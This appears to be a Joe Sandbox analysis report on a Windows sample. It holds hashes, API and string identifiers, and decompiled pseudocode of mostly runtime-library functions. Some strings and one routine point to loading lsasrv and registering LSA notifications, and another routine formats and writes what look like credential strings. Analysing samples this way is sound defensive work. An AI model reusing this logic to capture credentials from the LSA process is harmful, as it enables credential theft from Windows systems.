                                                                                                                                                                                        • Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Sleep_errno
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1068366078-0
                                                                                                                                                                                        • Opcode ID: 27c233027f4b1cc762992e46889d80dca534030d028143b08ddf39f412184f35
                                                                                                                                                                                        • Instruction ID: 5d7cb1d774a574cbb2b57d757349939822e5ed94f7327b591a4ec52b10ab141a
                                                                                                                                                                                        • Opcode Fuzzy Hash: 27c233027f4b1cc762992e46889d80dca534030d028143b08ddf39f412184f35
                                                                                                                                                                                        • Instruction Fuzzy Hash: 9201DB32A24B9586E784AF269401029F7A6F7C8FE0F890131DE5D17790CF3CE851C704
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 62%
                                                                                                                                                                                        			E00007FF77FF7CEF25C00(void* __ecx, void* __eflags, long long __rbx, long long __rsi, long long __rbp, long long _a16, long long _a24, long long _a32) {
                                                                                                                                                                                        				void* _v24;
                                                                                                                                                                                        				signed int _v40;
                                                                                                                                                                                        				intOrPtr _v53;
                                                                                                                                                                                        				char _v552;
                                                                                                                                                                                        				void* _v568;
                                                                                                                                                                                        				long long _v584;
                                                                                                                                                                                        				void* __rdi;
                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                        				signed long long _t83;
                                                                                                                                                                                        				signed long long _t84;
                                                                                                                                                                                        				signed long long _t85;
                                                                                                                                                                                        				signed long long _t88;
                                                                                                                                                                                        				signed long long _t90;
                                                                                                                                                                                        				void* _t105;
                                                                                                                                                                                        				void* _t112;
                                                                                                                                                                                        				void* _t120;
                                                                                                                                                                                        				void* _t131;
                                                                                                                                                                                        				void* _t134;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t115 = __rsi;
                                                                                                                                                                                        				_a16 = __rbx;
                                                                                                                                                                                        				_a24 = __rbp;
                                                                                                                                                                                        				_a32 = __rsi;
                                                                                                                                                                                        				_t83 =  *0xcef2eb60; // 0xd44e0b4a63bf
                                                                                                                                                                                        				_t84 = _t83 ^ _t120 - 0x00000250;
                                                                                                                                                                                        				_v40 = _t84;
                                                                                                                                                                                        				E00007FF77FF7CEF25BD4(__ecx);
                                                                                                                                                                                        				_t90 = _t84;
                                                                                                                                                                                        				if (_t84 == 0) goto 0xcef25e30;
                                                                                                                                                                                        				_t5 = _t115 + 3; // 0x3
                                                                                                                                                                                        				if (E00007FF77FF7CEF28C1C(_t5, _t84) == 1) goto 0xcef25dc8;
                                                                                                                                                                                        				_t6 = _t115 + 3; // 0x3
                                                                                                                                                                                        				if (E00007FF77FF7CEF28C1C(_t6, _t84) != 0) goto 0xcef25c6c;
                                                                                                                                                                                        				if ( *0xcef2e000 == 1) goto 0xcef25dc8;
                                                                                                                                                                                        				if (__ecx == 0xfc) goto 0xcef25e30;
                                                                                                                                                                                        				r12d = 0x314;
                                                                                                                                                                                        				if (E00007FF77FF7CEF28BB0(_t84, 0xcef2f5a0, _t105, L"Runtime Error!\n\nProgram: ") != 0) goto 0xcef25db5;
                                                                                                                                                                                        				r8d = 0x104;
                                                                                                                                                                                        				 *0xcef2f7da = 0;
                                                                                                                                                                                        				if (GetModuleFileNameW(??, ??, ??) != 0) goto 0xcef25cf1;
                                                                                                                                                                                        				if (E00007FF77FF7CEF28BB0(_t84, 0xcef2f5d2, 0xcef2f5d2, L"<program name unknown>") == 0) goto 0xcef25cf1;
                                                                                                                                                                                        				r9d = 0;
                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                        				_v584 = __rsi;
                                                                                                                                                                                        				E00007FF77FF7CEF2568C();
                                                                                                                                                                                        				asm("int3");
                                                                                                                                                                                        				_t33 = E00007FF77FF7CEF28B94(_t32, 0xcef2f5d2);
                                                                                                                                                                                        				_t85 = _t84 + 1;
                                                                                                                                                                                        				if (_t85 - 0x3c <= 0) goto 0xcef25d49;
                                                                                                                                                                                        				E00007FF77FF7CEF28B94(_t33, 0xcef2f5d2);
                                                                                                                                                                                        				r9d = 3;
                                                                                                                                                                                        				_t10 = _t85 * 2; // -68
                                                                                                                                                                                        				_t88 = 0xcef2f5a0 + _t10 - 0x44 - 0xcef2f5d2 >> 1;
                                                                                                                                                                                        				if (E00007FF77FF7CEF28AC4(_t88, 0xcef2f5a0 + _t10 - 0x44, _t112 - _t88, L"...", _t131) == 0) goto 0xcef25d49;
                                                                                                                                                                                        				r9d = 0;
                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                        				_v584 = __rsi;
                                                                                                                                                                                        				E00007FF77FF7CEF2568C();
                                                                                                                                                                                        				asm("int3");
                                                                                                                                                                                        				if (E00007FF77FF7CEF28A3C(_t88, 0xcef2f5a0, _t134, L"\n\n") != 0) goto 0xcef25da0;
                                                                                                                                                                                        				if (E00007FF77FF7CEF28A3C(_t88, 0xcef2f5a0, _t134, _t90) != 0) goto 0xcef25d8b;
                                                                                                                                                                                        				r8d = 0x12010;
                                                                                                                                                                                        				E00007FF77FF7CEF28834(0xcef2f5a0, L"Microsoft Visual C++ Runtime Library", _t131);
                                                                                                                                                                                        				goto 0xcef25e30;
                                                                                                                                                                                        				r9d = 0;
                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                        				_v584 = __rsi;
                                                                                                                                                                                        				E00007FF77FF7CEF2568C();
                                                                                                                                                                                        				asm("int3");
                                                                                                                                                                                        				r9d = 0;
                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                        				_v584 = __rsi;
                                                                                                                                                                                        				E00007FF77FF7CEF2568C();
                                                                                                                                                                                        				asm("int3");
                                                                                                                                                                                        				r9d = 0;
                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                        				_v584 = __rsi;
                                                                                                                                                                                        				E00007FF77FF7CEF2568C();
                                                                                                                                                                                        				asm("int3");
                                                                                                                                                                                        				_t39 = GetStdHandle(??);
                                                                                                                                                                                        				if (_t88 == 0) goto 0xcef25e30;
                                                                                                                                                                                        				if (_t88 == 0xffffffff) goto 0xcef25e30;
                                                                                                                                                                                        				_t16 =  &_v552; // 0x354
                                                                                                                                                                                        				 *_t16 =  *_t90;
                                                                                                                                                                                        				if ( *_t90 == 0) goto 0xcef25e03;
                                                                                                                                                                                        				if (1 - 0x1f4 < 0) goto 0xcef25de8;
                                                                                                                                                                                        				_v53 = sil;
                                                                                                                                                                                        				E00007FF77FF7CEF28080(_t39,  &_v552);
                                                                                                                                                                                        				_v584 = __rsi;
                                                                                                                                                                                        				WriteFile(??, ??, ??, ??, ??);
                                                                                                                                                                                        				return E00007FF77FF7CEF271F0( *_t90, _t90 + 2, _v40 ^ _t120 - 0x00000250, _t88, __rsi);
                                                                                                                                                                                        			}























                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
• Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: File_set_error_mode$CurrentHandleModuleNameProcessWrite
                                                                                                                                                                                        • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                                                                                        • API String ID: 2183313154-4022980321
                                                                                                                                                                                        • Opcode ID: ee30e25ceeb64b6f7566f0a35a21b345d76023c3b733a07fe50355b554bba3a2
                                                                                                                                                                                        • Instruction ID: c0aaf02259c8895d525a96cfcdfd676e8f6601d016283dd9540069342965d93e
                                                                                                                                                                                        • Opcode Fuzzy Hash: ee30e25ceeb64b6f7566f0a35a21b345d76023c3b733a07fe50355b554bba3a2
                                                                                                                                                                                        • Instruction Fuzzy Hash: 87510431B1C68242FBE5FF21A4156BAA291FF887A4FC44135EE4D27B85CF3CE1058621
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
• Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3778485334-0
                                                                                                                                                                                        • Opcode ID: bf1be38ff80d1e36a91b635a4a1ce7a4a76762dc689d6be8787abb1f1a7dd809
                                                                                                                                                                                        • Instruction ID: 85c02eca76c1284144cd96997de25771bf2c4b74eb34edfb7f60ffbc58492863
                                                                                                                                                                                        • Opcode Fuzzy Hash: bf1be38ff80d1e36a91b635a4a1ce7a4a76762dc689d6be8787abb1f1a7dd809
                                                                                                                                                                                        • Instruction Fuzzy Hash: 7231B235908F8686EB90AF55F84436AB3A0FB84764FD00536DA8D677A5DF7CE054CB20
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 41%
                                                                                                                                                                                        			E00007FF77FF7CEF25540(signed int __ecx, signed int __edx, long long __rbx, long long __rsi) {
                                                                                                                                                                                        				void* __rdi;
                                                                                                                                                                                        				void* _t37;
                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                        				int _t40;
                                                                                                                                                                                        				signed long long _t61;
                                                                                                                                                                                        				long long _t63;
                                                                                                                                                                                        				void* _t78;
                                                                                                                                                                                        				_Unknown_base(*)()* _t81;
                                                                                                                                                                                        				void* _t85;
                                                                                                                                                                                        				void* _t86;
                                                                                                                                                                                        				void* _t88;
                                                                                                                                                                                        				signed long long _t89;
                                                                                                                                                                                        				void* _t91;
                                                                                                                                                                                        				struct _EXCEPTION_POINTERS* _t96;
                                                                                                                                                                                        
                                                                                                                                                                                        				 *((long long*)(_t88 + 0x10)) = __rbx;
                                                                                                                                                                                        				 *((long long*)(_t88 + 0x18)) = __rsi;
                                                                                                                                                                                        				_t86 = _t88 - 0x4f0;
                                                                                                                                                                                        				_t89 = _t88 - 0x5f0;
                                                                                                                                                                                        				_t61 =  *0xcef2eb60; // 0xd44e0b4a63bf
                                                                                                                                                                                        				 *(_t86 + 0x4e0) = _t61 ^ _t89;
                                                                                                                                                                                        				if (__ecx == 0xffffffff) goto 0xcef2557f;
                                                                                                                                                                                        				_t38 = E00007FF77FF7CEF27FA4(_t37);
                                                                                                                                                                                        				 *(_t89 + 0x70) =  *(_t89 + 0x70) & 0x00000000;
                                                                                                                                                                                        				r8d = 0x94;
                                                                                                                                                                                        				E00007FF77FF7CEF26B20(_t38, __ecx, 0, _t89 + 0x74, _t78, _t91);
                                                                                                                                                                                        				_t63 = _t86 + 0x10;
                                                                                                                                                                                        				 *((long long*)(_t89 + 0x48)) = _t89 + 0x70;
                                                                                                                                                                                        				 *((long long*)(_t89 + 0x50)) = _t63;
                                                                                                                                                                                        				__imp__RtlCaptureContext();
                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                        				0xcef29158();
                                                                                                                                                                                        				if (_t63 == 0) goto 0xcef25606;
                                                                                                                                                                                        				 *(_t89 + 0x38) =  *(_t89 + 0x38) & 0x00000000;
                                                                                                                                                                                        				 *((long long*)(_t89 + 0x30)) = _t89 + 0x60;
                                                                                                                                                                                        				 *((long long*)(_t89 + 0x28)) = _t89 + 0x58;
                                                                                                                                                                                        				 *((long long*)(_t89 + 0x20)) = _t86 + 0x10;
                                                                                                                                                                                        				0xcef29152();
                                                                                                                                                                                        				goto 0xcef25622;
                                                                                                                                                                                        				 *((long long*)(_t86 + 0x108)) =  *((intOrPtr*)(_t86 + 0x508));
                                                                                                                                                                                        				 *((long long*)(_t86 + 0xa8)) = _t86 + 0x508;
                                                                                                                                                                                        				 *(_t89 + 0x70) = __edx;
                                                                                                                                                                                        				 *((intOrPtr*)(_t89 + 0x74)) = r8d;
                                                                                                                                                                                        				 *((long long*)(_t86 - 0x80)) =  *((intOrPtr*)(_t86 + 0x508));
                                                                                                                                                                                        				_t40 = IsDebuggerPresent();
                                                                                                                                                                                        				SetUnhandledExceptionFilter(_t81, _t85);
                                                                                                                                                                                        				if (UnhandledExceptionFilter(_t96) != 0) goto 0xcef25664;
                                                                                                                                                                                        				if (_t40 != 0) goto 0xcef25664;
                                                                                                                                                                                        				if (__ecx == 0xffffffff) goto 0xcef25664;
                                                                                                                                                                                        				E00007FF77FF7CEF27FA4(_t42);
                                                                                                                                                                                        				return E00007FF77FF7CEF271F0(__ecx, __rbx,  *(_t86 + 0x4e0) ^ _t89, _t81, __rsi);
                                                                                                                                                                                        			}


















                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1239891234-0
                                                                                                                                                                                        • Opcode ID: 5d36ba9e913c190f0612814cc419d9f76b2a0e889312af5377098d70428b273c
                                                                                                                                                                                        • Instruction ID: 68a194c857d61a31e66c7887317d4350ebb2d1f038c42c094d89026310328771
                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d36ba9e913c190f0612814cc419d9f76b2a0e889312af5377098d70428b273c
                                                                                                                                                                                        • Instruction Fuzzy Hash: CB31B532608F8286DBA0DF25E8407AEB7A0FB84764F900135EA9D57B99DF3CD545CB10
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Pointer$AddressDecodeEncodeProc$LibraryLoad
                                                                                                                                                                                        • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                                                                                                                                                                        • API String ID: 2643518689-564504941
                                                                                                                                                                                        • Opcode ID: 0c1cb570b7ca70ff1aa761079f1873bd645e17860191f496777693c89aa9f25e
                                                                                                                                                                                        • Instruction ID: 2c3307249759f7c5c3f66e362cc3953d9e75b3d3a0231988dd727dfa6ce29fd2
                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c1cb570b7ca70ff1aa761079f1873bd645e17860191f496777693c89aa9f25e
                                                                                                                                                                                        • Instruction Fuzzy Hash: 4C51E664A0AB4B81FED5FF61A854534A3A1AF89FB4F840535CC0E67764EF3CA4899321
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AddressProc$HandleModule$InitStringUnicode
                                                                                                                                                                                        • String ID: Canc$LoadLibraryW$LocalAlloc$LsaI$LsaIRegisterNotification$cati$elNo$kernel32$lsasrv$tifi
                                                                                                                                                                                        • API String ID: 3738668-3948219663
                                                                                                                                                                                        • Opcode ID: 6f8f85ba962e89d97fe287bde9444a89b4325c89c55aa2fde47133f471363508
                                                                                                                                                                                        • Instruction ID: 14d442da2d8fc0c3a2330f050174411eac0d7fee495d459cbe6085c0f162bf8d
                                                                                                                                                                                        • Opcode Fuzzy Hash: 6f8f85ba962e89d97fe287bde9444a89b4325c89c55aa2fde47133f471363508
                                                                                                                                                                                        • Instruction Fuzzy Hash: F0911F36B09B469AFB90EF64D8406AC73B5EB48768F814036CE0D67764DF38E549C360
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 36%
                                                                                                                                                                                        			E00007FF77FF7CEF23B74(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, void* __r8, void* _a8) {
                                                                                                                                                                                        				void* _v40;
                                                                                                                                                                                        				void* _v2088;
                                                                                                                                                                                        				long long _v2096;
                                                                                                                                                                                        				long long _v2104;
                                                                                                                                                                                        				void* _t79;
                                                                                                                                                                                        				intOrPtr _t80;
                                                                                                                                                                                        				intOrPtr* _t81;
                                                                                                                                                                                        				long long _t84;
                                                                                                                                                                                        				void* _t85;
                                                                                                                                                                                        				intOrPtr _t112;
                                                                                                                                                                                        				intOrPtr _t113;
                                                                                                                                                                                        				intOrPtr _t114;
                                                                                                                                                                                        				void* _t116;
                                                                                                                                                                                        				long long _t117;
                                                                                                                                                                                        				void* _t121;
                                                                                                                                                                                        				void* _t122;
                                                                                                                                                                                        				long long _t125;
                                                                                                                                                                                        				void* _t126;
                                                                                                                                                                                        				void* _t129;
                                                                                                                                                                                        				void* _t131;
                                                                                                                                                                                        				void* _t136;
                                                                                                                                                                                        				void* _t141;
                                                                                                                                                                                        				void* _t142;
                                                                                                                                                                                        				void* _t143;
                                                                                                                                                                                        				intOrPtr* _t144;
                                                                                                                                                                                        				void* _t146;
                                                                                                                                                                                        				intOrPtr* _t147;
                                                                                                                                                                                        				void* _t149;
                                                                                                                                                                                        				intOrPtr* _t150;
                                                                                                                                                                                        				long long _t152;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t125 = __rsi;
                                                                                                                                                                                        				_t84 = __rbx;
                                                                                                                                                                                        				_t79 = _t131;
                                                                                                                                                                                        				 *((long long*)(_t79 + 0x10)) = __rbx;
                                                                                                                                                                                        				 *((long long*)(_t79 + 0x18)) = __rbp;
                                                                                                                                                                                        				 *((long long*)(_t79 + 0x20)) = __rsi;
                                                                                                                                                                                        				r15d = 0;
                                                                                                                                                                                        				_t122 = __rcx;
                                                                                                                                                                                        				 *((intOrPtr*)(_t79 + 8)) = r15d;
                                                                                                                                                                                        				if ( *((intOrPtr*)(__rcx + 8)) != _t152) goto 0xcef23bbc;
                                                                                                                                                                                        				if ( *((intOrPtr*)(__rcx + 0x18)) != _t152) goto 0xcef23bbc;
                                                                                                                                                                                        				if ( *((intOrPtr*)(__rcx + 0x28)) == _t152) goto 0xcef23d86;
                                                                                                                                                                                        				_t112 =  *0xcef30688; // 0x0
                                                                                                                                                                                        				if (E00007FF77FF7CEF2224C(__rbx, __rcx, _t112, __rsi, _t152) == 0) goto 0xcef23bda;
                                                                                                                                                                                        				E00007FF77FF7CEF222F0(_t84, _t122, _t149);
                                                                                                                                                                                        				_t85 =  !=  ? _t122 : _t84;
                                                                                                                                                                                        				_t113 =  *0xcef30688; // 0x0
                                                                                                                                                                                        				_t142 = _t122 + 0x10;
                                                                                                                                                                                        				if (E00007FF77FF7CEF2224C(_t85, _t142, _t113, _t125, _t146) == 0) goto 0xcef23bff;
                                                                                                                                                                                        				E00007FF77FF7CEF222F0(_t85, _t142, _t141);
                                                                                                                                                                                        				_t126 =  !=  ? _t142 : _t125;
                                                                                                                                                                                        				_t114 =  *0xcef30688; // 0x0
                                                                                                                                                                                        				_t143 = _t122 + 0x20;
                                                                                                                                                                                        				if (E00007FF77FF7CEF2224C(_t85, _t143, _t114, _t126, _t121) == 0) goto 0xcef23d59;
                                                                                                                                                                                        				_t80 =  *0xcef30920; // 0x7ff7cef2c018
                                                                                                                                                                                        				_t12 = _t80 + 0x20; // 0x7ff7cef2f4c0
                                                                                                                                                                                        				_t81 =  *_t12;
                                                                                                                                                                                        				 *_t81();
                                                                                                                                                                                        				if (E00007FF77FF7CEF222F0(_t85, _t143) == 0) goto 0xcef23d59;
                                                                                                                                                                                        				_t129 = _t143;
                                                                                                                                                                                        				if (_t143 == 0) goto 0xcef23d59;
                                                                                                                                                                                        				E00007FF77FF7CEF23A80(_t81, _t85, _t85);
                                                                                                                                                                                        				_t147 = _t81;
                                                                                                                                                                                        				E00007FF77FF7CEF23A80(_t81, _t85, _t126);
                                                                                                                                                                                        				_t144 = _t81;
                                                                                                                                                                                        				E00007FF77FF7CEF23A80(_t81, _t85, _t129);
                                                                                                                                                                                        				_t150 = _t81;
                                                                                                                                                                                        				if (_t144 == 0) goto 0xcef23c8b;
                                                                                                                                                                                        				__imp__StrChrW();
                                                                                                                                                                                        				_t116 =  !=  ? _t152 : _t144;
                                                                                                                                                                                        				goto 0xcef23c8e;
                                                                                                                                                                                        				_t117 = _t152;
                                                                                                                                                                                        				if (_t117 == 0) goto 0xcef23ca6;
                                                                                                                                                                                        				if (_t147 != 0) goto 0xcef23ca9;
                                                                                                                                                                                        				_t99 =  !=  ? _t150 : 0xcef2c040;
                                                                                                                                                                                        				_t83 =  !=  ? _t147 : 0xcef2c040;
                                                                                                                                                                                        				_v2096 =  !=  ? _t150 : 0xcef2c040;
                                                                                                                                                                                        				_t136 =  !=  ? _t117 : 0xcef2c040;
                                                                                                                                                                                        				_v2104 = 0xcef2c040;
                                                                                                                                                                                        				wsprintfW(??, ??);
                                                                                                                                                                                        				asm("repne scasw");
                                                                                                                                                                                        				GetModuleHandleW(??);
                                                                                                                                                                                        				GetProcAddress(??, ??);
                                                                                                                                                                                        				r8d =  !( &_v2088 | 0xffffffff) +  !( &_v2088 | 0xffffffff);
                                                                                                                                                                                        				_v2104 = _t152;
                                                                                                                                                                                        				 *((long long*)( !=  ? _t147 : 0xcef2c040))();
                                                                                                                                                                                        				if (_t147 == 0) goto 0xcef23d3d;
                                                                                                                                                                                        				LocalFree(??);
                                                                                                                                                                                        				if (_t144 == 0) goto 0xcef23d4b;
                                                                                                                                                                                        				LocalFree(??);
                                                                                                                                                                                        				if (_t150 == 0) goto 0xcef23d59;
                                                                                                                                                                                        				LocalFree(??);
                                                                                                                                                                                        				if (_t85 == 0) goto 0xcef23d68;
                                                                                                                                                                                        				LocalFree(??);
                                                                                                                                                                                        				if (_t126 == 0) goto 0xcef23d77;
                                                                                                                                                                                        				LocalFree(??);
                                                                                                                                                                                        				if (_t129 == 0) goto 0xcef23d86;
                                                                                                                                                                                        				return LocalFree(??);
                                                                                                                                                                                        			}

































                                                                                                                                                                                        0x7ff7cef23d71
                                                                                                                                                                                        0x7ff7cef23d7a
                                                                                                                                                                                        0x7ff7cef23da6

                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: FreeLocal$AddressHandleModuleProcwsprintf
                                                                                                                                                                                        • String ID: %lS%lS%lS:%lS$WriteFile$kernel32
                                                                                                                                                                                        • API String ID: 602150089-2677625405
                                                                                                                                                                                        • Opcode ID: b11d8622920a2f47f9daaeab12ed3a5efb95e5e1c83adc421bcd68cf021e0860
                                                                                                                                                                                        • Instruction ID: 3bd185a26294540baaf26314c89003de45e474ddbcbd095658e9b19d423db881
                                                                                                                                                                                        • Opcode Fuzzy Hash: b11d8622920a2f47f9daaeab12ed3a5efb95e5e1c83adc421bcd68cf021e0860
                                                                                                                                                                                        • Instruction Fuzzy Hash: 91517561709A4782EA98FF12A800676A3A0FF84FA4FD45135DD1E6B7A4DF3CE545C360
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AddressHandleModuleProc$FreeLocal
                                                                                                                                                                                        • String ID: LocalAlloc$kernel32
                                                                                                                                                                                        • API String ID: 3514375268-3502785670
